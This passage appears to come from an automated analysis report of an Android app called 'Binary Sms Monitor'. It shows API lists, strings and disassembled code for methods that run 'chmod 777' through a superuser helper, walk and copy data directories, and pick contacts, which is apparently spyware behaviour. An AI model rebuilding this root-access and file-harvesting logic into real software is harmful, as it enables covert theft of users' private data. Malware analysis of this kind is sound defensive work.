    • android.widget.Button.setOnClickListener
    • com.binary.sms.receiver.SkeletonActivity.findViewById
    • com.binary.sms.receiver.SkeletonActivity.smsDataBtn:Landroid/widget/Button
    • android.widget.Button.setOnClickListener
    • com.binary.sms.receiver.SkeletonActivity.findViewById
    • com.binary.sms.receiver.SkeletonActivity.btnBack:Landroid/widget/Button
    • android.widget.Button.setOnClickListener
    • java.lang.StringBuilder.<init>
    • java.lang.Exception.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    Strings
    • Binary Sms Monitor
    • onCreate
    • onCreate:
    Position Instruction Meta Information
    0.param p1, "savedInstanceState" # Landroid/os/Bundle;
    1.prologue
    3invoke-super {p0, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V
    4const/high16 v1, 0x7f030000
    5try_start_5:
    6invoke-virtual {p0, v1}, Lcom/binary/sms/receiver/SkeletonActivity;->setContentView(I)V
    7const/high16 v1, 0x7f070000
    9invoke-virtual {p0, v1}, Lcom/binary/sms/receiver/SkeletonActivity;->findViewById(I)Landroid/view/View;
    10move-result-object v1
    11check-cast v1, Landroid/widget/EditText;
    12iput-object v1, p0, Lcom/binary/sms/receiver/SkeletonActivity;->mEditor:Landroid/widget/EditText;
    13const v1, 0x7f070004
    15invoke-virtual {p0, v1}, Lcom/binary/sms/receiver/SkeletonActivity;->findViewById(I)Landroid/view/View;
    16move-result-object v1
    17check-cast v1, Landroid/widget/Button;
    19iget-object v2, p0, Lcom/binary/sms/receiver/SkeletonActivity;->mClearListener:Landroid/view/View$OnClickListener;
    21invoke-virtual {v1, v2}, Landroid/widget/Button;->setOnClickListener(Landroid/view/View$OnClickListener;)V
    23iget-object v1, p0, Lcom/binary/sms/receiver/SkeletonActivity;->mEditor:Landroid/widget/EditText;
    25invoke-static {v1, p0}, Lcom/binary/sms/receiver/Logger;->setTextField(Landroid/widget/EditText;Landroid/app/Activity;)V
    27iget-object v1, p0, Lcom/binary/sms/receiver/SkeletonActivity;->mEditor:Landroid/widget/EditText;
    29const-string v2, "Binary Sms Monitor"
    31invoke-virtual {v1, v2}, Landroid/widget/EditText;->setText(Ljava/lang/CharSequence;)V
    33const-string v1, "onCreate"
    34const/4 v2, 0x0
    36invoke-static {v1, v2}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;Z)V
    37const v1, 0x7f070001
    39invoke-virtual {p0, v1}, Lcom/binary/sms/receiver/SkeletonActivity;->findViewById(I)Landroid/view/View;
    40move-result-object v1
    41check-cast v1, Landroid/widget/EditText;
    42iput-object v1, p0, Lcom/binary/sms/receiver/SkeletonActivity;->phoneNumber:Landroid/widget/EditText;
    43const v1, 0x7f070002
    45invoke-virtual {p0, v1}, Lcom/binary/sms/receiver/SkeletonActivity;->findViewById(I)Landroid/view/View;
    46move-result-object v1
    47check-cast v1, Landroid/widget/EditText;
    48iput-object v1, p0, Lcom/binary/sms/receiver/SkeletonActivity;->smsBody:Landroid/widget/EditText;
    49const v1, 0x7f070005
    51invoke-virtual {p0, v1}, Lcom/binary/sms/receiver/SkeletonActivity;->findViewById(I)Landroid/view/View;
    52move-result-object v1
    53check-cast v1, Landroid/widget/Button;
    54iput-object v1, p0, Lcom/binary/sms/receiver/SkeletonActivity;->btnContacts:Landroid/widget/Button;
    56iget-object v1, p0, Lcom/binary/sms/receiver/SkeletonActivity;->btnContacts:Landroid/widget/Button;
    57new-instance v2, Lcom/binary/sms/receiver/SkeletonActivity$3;
    59invoke-direct {v2, p0}, Lcom/binary/sms/receiver/SkeletonActivity$3;-><init>(Lcom/binary/sms/receiver/SkeletonActivity;)V
    61invoke-virtual {v1, v2}, Landroid/widget/Button;->setOnClickListener(Landroid/view/View$OnClickListener;)V
    62const v1, 0x7f070006
    64invoke-virtual {p0, v1}, Lcom/binary/sms/receiver/SkeletonActivity;->findViewById(I)Landroid/view/View;
    65move-result-object v1
    66check-cast v1, Landroid/widget/Button;
    67iput-object v1, p0, Lcom/binary/sms/receiver/SkeletonActivity;->smsDataBtn:Landroid/widget/Button;
    69iget-object v1, p0, Lcom/binary/sms/receiver/SkeletonActivity;->smsDataBtn:Landroid/widget/Button;
    70new-instance v2, Lcom/binary/sms/receiver/SkeletonActivity$4;
    72invoke-direct {v2, p0}, Lcom/binary/sms/receiver/SkeletonActivity$4;-><init>(Lcom/binary/sms/receiver/SkeletonActivity;)V
    74invoke-virtual {v1, v2}, Landroid/widget/Button;->setOnClickListener(Landroid/view/View$OnClickListener;)V
    75const v1, 0x7f070003
    77invoke-virtual {p0, v1}, Lcom/binary/sms/receiver/SkeletonActivity;->findViewById(I)Landroid/view/View;
    78move-result-object v1
    79check-cast v1, Landroid/widget/Button;
    80iput-object v1, p0, Lcom/binary/sms/receiver/SkeletonActivity;->btnBack:Landroid/widget/Button;
    82iget-object v1, p0, Lcom/binary/sms/receiver/SkeletonActivity;->btnBack:Landroid/widget/Button;
    83new-instance v2, Lcom/binary/sms/receiver/SkeletonActivity$5;
    85invoke-direct {v2, p0}, Lcom/binary/sms/receiver/SkeletonActivity$5;-><init>(Lcom/binary/sms/receiver/SkeletonActivity;)V
    87invoke-virtual {v1, v2}, Landroid/widget/Button;->setOnClickListener(Landroid/view/View$OnClickListener;)V
    88goto_87: return-void
    89catch_88: move-exception v0
    90new-instance v1, Ljava/lang/StringBuilder;
    92const-string v2, "onCreate: "
    94invoke-direct {v1, v2}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    96invoke-virtual {v0}, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
    97move-result-object v2
    99invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    100move-result-object v1
    102invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    103move-result-object v1
    105invoke-static {v1, v0}, Lcom/binary/sms/receiver/Logger;->error(Ljava/lang/String;Ljava/lang/Throwable;)V
    106goto/16 :goto_87
    Cross References
    APIs
    • java.lang.StringBuilder.<init>
    • java.io.File.getAbsolutePath
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.io.File.isDirectory
    • java.io.File.listFiles
    • java.lang.String.valueOf
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • java.lang.Exception.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • java.lang.Exception.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    Strings
    • chmod 777
    • copyFiles
    • copyFiles ext
    Position Instruction Meta Information
    0.param p1, "f" # Ljava/io/File;
    1.param p2, "dest" # Ljava/lang/String;
    2.prologue
    3const/4 v4, 0x0
    4const/4 v5, 0x1
    5try_start_2: new-array v1, v5, [Ljava/lang/String;
    6const/4 v5, 0x0
    7new-instance v6, Ljava/lang/StringBuilder;
    9const-string v7, "chmod 777 "
    11invoke-direct {v6, v7}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    13invoke-virtual {p1}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
    14move-result-object v7
    16invoke-virtual {v6, v7}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    17move-result-object v6
    19invoke-virtual {v6}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    20move-result-object v6
    21aput-object v6, v1, v5
    23iget-object v5, p0, Lcom/binary/sms/receiver/SkeletonActivity$7;->val$suComand:Ljava/lang/String;
    25invoke-virtual {p0, v5, v1}, Lcom/binary/sms/receiver/SkeletonActivity$7;->sume(Ljava/lang/String;[Ljava/lang/String;)V
    27invoke-virtual {p1}, Ljava/io/File;->isDirectory()Z
    28move-result v5
    29if-eqz v5, :cond_2e
    31invoke-virtual {p1}, Ljava/io/File;->listFiles()[Ljava/io/File;
    32move-result-object v3
    33if-eqz v3, :cond_2e
    34array-length v5, v3
    35goto_2c: if-lt v4, v5, :cond_2f
    36cond_2e: return-void
    37cond_2f: aget-object v0, v3, v4
    38try_end_31: new-instance v6, Ljava/lang/StringBuilder;
    40invoke-static {p2}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
    41move-result-object v7
    43invoke-direct {v6, v7}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    45iget-object v7, p0, Lcom/binary/sms/receiver/SkeletonActivity$7;->val$source:Ljava/lang/String;
    47invoke-virtual {v6, v7}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    48move-result-object v6
    50invoke-virtual {v6}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    51move-result-object v6
    53invoke-virtual {p0, v0, v6}, Lcom/binary/sms/receiver/SkeletonActivity$7;->chmodFiles(Ljava/io/File;Ljava/lang/String;)V
    54try_end_47: add-int/lit8 v4, v4, 0x1
    55goto/16 :goto_2c
    56catch_4a: move-exception v2
    57try_start_4b: new-instance v6, Ljava/lang/StringBuilder;
    59const-string v7, "copyFiles"
    61invoke-direct {v6, v7}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    63invoke-virtual {v2}, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
    64move-result-object v7
    66invoke-virtual {v6, v7}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    67move-result-object v6
    69invoke-virtual {v6}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    70move-result-object v6
    72invoke-static {v6, v2}, Lcom/binary/sms/receiver/Logger;->error(Ljava/lang/String;Ljava/lang/Throwable;)V
    73try_end_61: goto/16 :goto_47
    74catch_62: move-exception v2
    75new-instance v4, Ljava/lang/StringBuilder;
    77const-string v5, "copyFiles ext"
    79invoke-direct {v4, v5}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    81invoke-virtual {v2}, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
    82move-result-object v5
    84invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    85move-result-object v4
    87invoke-virtual {v4}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    88move-result-object v4
    90invoke-static {v4, v2}, Lcom/binary/sms/receiver/Logger;->error(Ljava/lang/String;Ljava/lang/Throwable;)V
    91goto/16 :goto_2e
    Cross References
    APIs
    • java.io.File.exists
    • java.io.File.mkdirs
    • java.lang.StringBuilder.<init>
    • java.io.File.getAbsolutePath
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.io.IOException.<init>
    • java.lang.StringBuilder.<init>
    • java.io.File.getAbsolutePath
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • java.io.File.getAbsolutePath
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    Strings
    • copyFiles: Could not create direcotry:
    • .
    • copy dir src:
    • copy dir des:
    Position Instruction Meta Information
    0.param p0, "src" # Ljava/io/File;
    1.param p1, "dest" # Ljava/io/File;
    2.annotation system Ldalvik/annotation/Throws;
    3value = {
    4Ljava/io/IOException;
    5}
    6.end annotation
    7.prologue
    9invoke-virtual {p1}, Ljava/io/File;->exists()Z
    10move-result v0
    11if-nez v0, :cond_57
    13invoke-virtual {p1}, Ljava/io/File;->mkdirs()Z
    14move-result v0
    15if-nez v0, :cond_2b
    16new-instance v0, Ljava/io/IOException;
    17new-instance v1, Ljava/lang/StringBuilder;
    19const-string v2, "copyFiles: Could not create direcotry: "
    21invoke-direct {v1, v2}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    23invoke-virtual {p1}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
    24move-result-object v2
    26invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    27move-result-object v1
    29const-string v2, "."
    31invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    32move-result-object v1
    34invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    35move-result-object v1
    37invoke-direct {v0, v1}, Ljava/io/IOException;-><init>(Ljava/lang/String;)V
    38throw v0
    39cond_2b: new-instance v0, Ljava/lang/StringBuilder;
    41const-string v1, "copy dir src: "
    43invoke-direct {v0, v1}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    45invoke-virtual {p0}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
    46move-result-object v1
    48invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    49move-result-object v0
    51invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    52move-result-object v0
    54invoke-static {v0}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    55new-instance v0, Ljava/lang/StringBuilder;
    57const-string v1, "copy dir des: "
    59invoke-direct {v0, v1}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    61invoke-virtual {p1}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
    62move-result-object v1
    64invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    65move-result-object v0
    67invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    68move-result-object v0
    70invoke-static {v0}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    71cond_57: return-void
    Cross References
    APIs
    • java.util.LinkedList.<init>
    • java.io.File.<init>
    • java.io.File.exists
    • java.lang.StringBuilder.<init>
    • java.io.File.getAbsolutePath
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.io.File.<init>
    • com.binary.sms.receiver.SkeletonActivity.getFileList
    • java.lang.StringBuilder.<init>
    • java.lang.Exception.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    Strings
    • file not exist:
    • getDataFileList:
    Position Instruction Meta Information
    0.param p0, "source" # Ljava/lang/String;
    1.annotation system Ldalvik/annotation/Signature;
    2value = {
    3"(",
    4"Ljava/lang/String;",
    5")",
    6"Ljava/util/List",
    7"<",
    8"Ljava/lang/String;",
    9">;"
    10}
    11.end annotation
    12.prologue
    13new-instance v2, Ljava/util/LinkedList;
    15invoke-direct {v2}, Ljava/util/LinkedList;-><init>()V
    16try_start_5: new-instance v0, Ljava/io/File;
    18invoke-direct {v0, p0}, Ljava/io/File;-><init>(Ljava/lang/String;)V
    20invoke-virtual {v0}, Ljava/io/File;->exists()Z
    21move-result v3
    22if-nez v3, :cond_26
    23new-instance v3, Ljava/lang/StringBuilder;
    25const-string v4, "file not exist: "
    27invoke-direct {v3, v4}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    29invoke-virtual {v0}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
    30move-result-object v4
    32invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    33move-result-object v3
    35invoke-virtual {v3}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    36move-result-object v3
    38invoke-static {v3}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    39cond_26: new-instance v3, Ljava/io/File;
    41invoke-direct {v3, p0}, Ljava/io/File;-><init>(Ljava/lang/String;)V
    43invoke-static {v3, v2}, Lcom/binary/sms/receiver/SkeletonActivity;->getFileList(Ljava/io/File;Ljava/util/List;)V
    44try_end_2e: return-object v2
    45catch_2f: move-exception v1
    46new-instance v3, Ljava/lang/StringBuilder;
    48const-string v4, "getDataFileList: "
    50invoke-direct {v3, v4}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    52invoke-virtual {v1}, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
    53move-result-object v4
    55invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    56move-result-object v3
    58invoke-virtual {v3}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    59move-result-object v3
    61invoke-static {v3, v1}, Lcom/binary/sms/receiver/Logger;->error(Ljava/lang/String;Ljava/lang/Throwable;)V
    62goto/16 :goto_2e
    APIs
    • android.provider.ContactsContract$Contacts.CONTENT_URI:Landroid/net/Uri
    • android.content.Intent.<init>
    • com.binary.sms.receiver.SkeletonActivity.startActivityForResult
    • com.binary.sms.receiver.SkeletonActivity.getApplicationContext
    • android.widget.Toast.makeText
    • android.widget.Toast.show
    • java.lang.StringBuilder.<init>
    • java.lang.Throwable.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • android.util.Log.e
    Strings
    • android.intent.action.PICK
    • Your sms has failed...
    • MyWap
    • sendSmsByManager exception:
    Position Instruction Meta Information
    0.param p1, "v" # Landroid/view/View;
    1.prologue
    2const/4 v4, 0x1
    3try_start_1: new-instance v1, Landroid/content/Intent;
    5const-string v2, "android.intent.action.PICK"
    7sget-object v3, Landroid/provider/ContactsContract$Contacts;->CONTENT_URI:Landroid/net/Uri;
    9invoke-direct {v1, v2, v3}, Landroid/content/Intent;-><init>(Ljava/lang/String;Landroid/net/Uri;)V
    11iget-object v2, p0, Lcom/binary/sms/receiver/SkeletonActivity$3;->this$0:Lcom/binary/sms/receiver/SkeletonActivity;
    12const/4 v3, 0x1
    14invoke-virtual {v2, v1, v3}, Lcom/binary/sms/receiver/SkeletonActivity;->startActivityForResult(Landroid/content/Intent;I)V
    15goto_10: return-void
    16catch_11: move-exception v0
    18iget-object v2, p0, Lcom/binary/sms/receiver/SkeletonActivity$3;->this$0:Lcom/binary/sms/receiver/SkeletonActivity;
    20invoke-virtual {v2}, Lcom/binary/sms/receiver/SkeletonActivity;->getApplicationContext()Landroid/content/Context;
    21move-result-object v2
    23const-string v3, "Your sms has failed..."
    25invoke-static {v2, v3, v4}, Landroid/widget/Toast;->makeText(Landroid/content/Context;Ljava/lang/CharSequence;I)Landroid/widget/Toast;
    26move-result-object v2
    28invoke-virtual {v2}, Landroid/widget/Toast;->show()V
    30const-string v2, "MyWap"
    31new-instance v3, Ljava/lang/StringBuilder;
    33const-string v4, "sendSmsByManager exception:"
    35invoke-direct {v3, v4}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    37invoke-virtual {v0}, Ljava/lang/Throwable;->getMessage()Ljava/lang/String;
    38move-result-object v4
    40invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    41move-result-object v3
    43invoke-virtual {v3}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    44move-result-object v3
    46invoke-static {v2, v3, v0}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;Ljava/lang/Throwable;)I
    47goto/16 :goto_10
    APIs
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • java.lang.Exception.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    Strings
    • systemCall:
    • systemCall end:
    • readMails:
    Position Instruction Meta Information
    0.prologue
    1try_start_0: new-instance v1, Ljava/lang/StringBuilder;
    3const-string v2, "systemCall: "
    5invoke-direct {v1, v2}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    7iget-object v2, p0, Lcom/binary/sms/receiver/SkeletonActivity$9;->val$suComand:Ljava/lang/String;
    9invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    10move-result-object v1
    12invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    13move-result-object v1
    15invoke-static {v1}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    17iget-object v1, p0, Lcom/binary/sms/receiver/SkeletonActivity$9;->val$suComand:Ljava/lang/String;
    19iget-object v2, p0, Lcom/binary/sms/receiver/SkeletonActivity$9;->val$commands:[Ljava/lang/String;
    21iget-object v3, p0, Lcom/binary/sms/receiver/SkeletonActivity$9;->val$source:Ljava/lang/String;
    23invoke-virtual {p0, v1, v2, v3}, Lcom/binary/sms/receiver/SkeletonActivity$9;->sume(Ljava/lang/String;[Ljava/lang/String;Ljava/lang/String;)V
    24new-instance v1, Ljava/lang/StringBuilder;
    26const-string v2, "systemCall end: "
    28invoke-direct {v1, v2}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    30iget-object v2, p0, Lcom/binary/sms/receiver/SkeletonActivity$9;->val$suComand:Ljava/lang/String;
    32invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    33move-result-object v1
    35invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    36move-result-object v1
    38invoke-static {v1}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    39goto_31: return-void
    40catch_32: move-exception v0
    41new-instance v1, Ljava/lang/StringBuilder;
    43const-string v2, "readMails: "
    45invoke-direct {v1, v2}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    47invoke-virtual {v0}, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
    48move-result-object v2
    50invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    51move-result-object v1
    53invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    54move-result-object v1
    56invoke-static {v1, v0}, Lcom/binary/sms/receiver/Logger;->error(Ljava/lang/String;Ljava/lang/Throwable;)V
    57goto/16 :goto_31
    APIs
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • java.lang.Exception.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    Strings
    • systemCallRemove:
    • systemCallRemove end:
    • readMails:
    Position Instruction Meta Information
    0.prologue
    1try_start_0: new-instance v1, Ljava/lang/StringBuilder;
    3const-string v2, "systemCallRemove: "
    5invoke-direct {v1, v2}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    7iget-object v2, p0, Lcom/binary/sms/receiver/SkeletonActivity$8;->val$suComand:Ljava/lang/String;
    9invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    10move-result-object v1
    12invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    13move-result-object v1
    15invoke-static {v1}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    17iget-object v1, p0, Lcom/binary/sms/receiver/SkeletonActivity$8;->val$suComand:Ljava/lang/String;
    19invoke-virtual {p0, v1}, Lcom/binary/sms/receiver/SkeletonActivity$8;->sume(Ljava/lang/String;)V
    20new-instance v1, Ljava/lang/StringBuilder;
    22const-string v2, "systemCallRemove end: "
    24invoke-direct {v1, v2}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    26iget-object v2, p0, Lcom/binary/sms/receiver/SkeletonActivity$8;->val$suComand:Ljava/lang/String;
    28invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    29move-result-object v1
    31invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    32move-result-object v1
    34invoke-static {v1}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    35try_end_2d: return-void
    36catch_2e: move-exception v0
    37new-instance v1, Ljava/lang/StringBuilder;
    39const-string v2, "readMails: "
    41invoke-direct {v1, v2}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    43invoke-virtual {v0}, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
    44move-result-object v2
    46invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    47move-result-object v1
    49invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    50move-result-object v1
    52invoke-static {v1, v0}, Lcom/binary/sms/receiver/Logger;->error(Ljava/lang/String;Ljava/lang/Throwable;)V
    53goto/16 :goto_2d
    Cross References
    APIs
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • com.binary.sms.receiver.SkeletonActivity.chmodSU
    • com.binary.sms.receiver.SkeletonActivity.chmodCsk
    • java.lang.StringBuilder.<init>
    • java.lang.Exception.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    Strings
    • chmod isSu :
    • chmod chmodSu
    • chmod chmodCsk
    • chmod:
    Position Instruction Meta Information
    0.param p1, "filePath" # Ljava/lang/String;
    1.prologue
    2const/4 v1, 0x0
    3try_start_1: new-instance v2, Ljava/lang/StringBuilder;
    5const-string v3, "chmod isSu :"
    7invoke-direct {v2, v3}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    9invoke-virtual {v2, v1}, Ljava/lang/StringBuilder;->append(Z)Ljava/lang/StringBuilder;
    10move-result-object v2
    12invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    13move-result-object v2
    15invoke-static {v2}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    16if-eqz v1, :cond_1e
    18const-string v2, "chmod chmodSu"
    20invoke-static {v2}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    22invoke-virtual {p0, p1}, Lcom/binary/sms/receiver/SkeletonActivity;->chmodSU(Ljava/lang/String;)V
    23goto_1d: return-void
    24cond_1e:
    25const-string v2, "chmod chmodCsk"
    27invoke-static {v2}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    29invoke-virtual {p0, p1}, Lcom/binary/sms/receiver/SkeletonActivity;->chmodCsk(Ljava/lang/String;)V
    30try_end_26: goto/16 :goto_1d
    31catch_27: move-exception v0
    32new-instance v2, Ljava/lang/StringBuilder;
    34const-string v3, "chmod: "
    36invoke-direct {v2, v3}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    38invoke-virtual {v0}, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
    39move-result-object v3
    41invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    42move-result-object v2
    44invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    45move-result-object v2
    47invoke-static {v2, v0}, Lcom/binary/sms/receiver/Logger;->error(Ljava/lang/String;Ljava/lang/Throwable;)V
    48goto/16 :goto_1d
    APIs
    • com.binary.sms.receiver.SkeletonActivity.finish
    • com.binary.sms.receiver.SkeletonActivity.getApplicationContext
    • android.widget.Toast.makeText
    • android.widget.Toast.show
    • java.lang.StringBuilder.<init>
    • java.lang.Throwable.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • android.util.Log.e
    Strings
    • Your sms has failed...
    • MyWap
    • sendSmsByManager exception:
    Position Instruction Meta Information
    0.param p1, "v" # Landroid/view/View;
    1.prologue
    2try_start_0:
    3iget-object v1, p0, Lcom/binary/sms/receiver/SkeletonActivity$5;->this$0:Lcom/binary/sms/receiver/SkeletonActivity;
    5invoke-virtual {v1}, Lcom/binary/sms/receiver/SkeletonActivity;->finish()V
    6try_end_5: return-void
    7catch_6: move-exception v0
    9iget-object v1, p0, Lcom/binary/sms/receiver/SkeletonActivity$5;->this$0:Lcom/binary/sms/receiver/SkeletonActivity;
    11invoke-virtual {v1}, Lcom/binary/sms/receiver/SkeletonActivity;->getApplicationContext()Landroid/content/Context;
    12move-result-object v1
    14const-string v2, "Your sms has failed..."
    15const/4 v3, 0x1
    17invoke-static {v1, v2, v3}, Landroid/widget/Toast;->makeText(Landroid/content/Context;Ljava/lang/CharSequence;I)Landroid/widget/Toast;
    18move-result-object v1
    20invoke-virtual {v1}, Landroid/widget/Toast;->show()V
    22const-string v1, "MyWap"
    23new-instance v2, Ljava/lang/StringBuilder;
    25const-string v3, "sendSmsByManager exception:"
    27invoke-direct {v2, v3}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    29invoke-virtual {v0}, Ljava/lang/Throwable;->getMessage()Ljava/lang/String;
    30move-result-object v3
    32invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    33move-result-object v2
    35invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    36move-result-object v2
    38invoke-static {v1, v2, v0}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;Ljava/lang/Throwable;)I
    39goto/16 :goto_5
    Cross References
    APIs
    • java.io.File.getAbsolutePath
    • java.util.List.add
    • java.io.File.isDirectory
    • java.io.File.listFiles
    • com.binary.sms.receiver.SkeletonActivity.getFileList
    • java.lang.StringBuilder.<init>
    • java.lang.Exception.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    Strings
    • getFileList:
    Position Instruction Meta Information
    0.param p0, "f" # Ljava/io/File;
    1.annotation system Ldalvik/annotation/Signature;
    2value = {
    3"(",
    4"Ljava/io/File;",
